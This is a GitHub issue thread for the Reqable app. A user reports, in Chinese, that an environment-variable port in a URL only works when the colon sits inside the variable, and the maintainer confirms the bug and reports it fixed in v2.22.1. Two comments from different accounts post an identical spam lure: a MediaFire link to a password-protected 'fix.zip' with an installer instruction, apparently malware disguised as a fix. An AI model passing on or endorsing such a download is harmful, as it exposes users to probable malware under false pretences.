### ISSUE TITLE
[bug] 使用环境变量 请求 http://<<IP>>:<<PORT>> 这样的url不成功

### ISSUE THREAD

**Issue by ahrime** [reqable/reqable-app#872]
**Describe the bug**
url 使用环境变量

使用 http://\<\<IP\>\>:<<UPNP_PORT>>/upnp/event/renderconnmgr1 这样不行；
使用 http://\<\<IP\>\>:49595/upnp/event/renderconnmgr1 这样ok；
使用 http://\<\<IP\>\><<UPNP_PORT>>/upnp/event/renderconnmgr1 这样ok,冒号放入变量内；

在官网文档中没有看到说端口号变量需要加上“:”,这个是否是个bug？

**To Reproduce**
3. See error

**Expected behavior**

**Screenshots**

**Information**
 - Platform: windows
 - OS: Win 11
 - Arch: x86
 - App Version:

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MegatronKing** [comment]
@ahrime 感谢反馈，确认是bug，我们尽快修复。

**Comment by MegatronKing** [comment]
v2.22.1已修复。
